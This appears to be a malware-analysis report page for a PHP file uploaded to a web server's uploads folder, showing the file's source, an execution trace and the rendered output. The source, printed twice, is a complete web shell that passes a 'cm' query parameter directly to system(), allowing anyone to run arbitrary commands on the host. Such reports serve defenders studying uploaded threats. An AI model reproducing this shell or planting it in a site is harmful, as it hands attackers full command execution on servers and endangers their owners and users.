Jump to:
Screenshot
Attributes
Execution
<?php
echo "<form method=\"get\"> <input type=\"text\" name=\"cm\"> <button type=\"submit\">Submit</button></form>";
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:28:52.445828]
1 0 1 0.000138 393528
1 3 0 0.000188 394352 {main} 1 /var/www/html/uploads/00000000ax.php 0 0
1 3 1 0.000206 394352
0.000233 314240
TRACE END [2023-02-13 02:28:52.445949]
<html><head></head><body><form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form></body></html>
<?php
echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}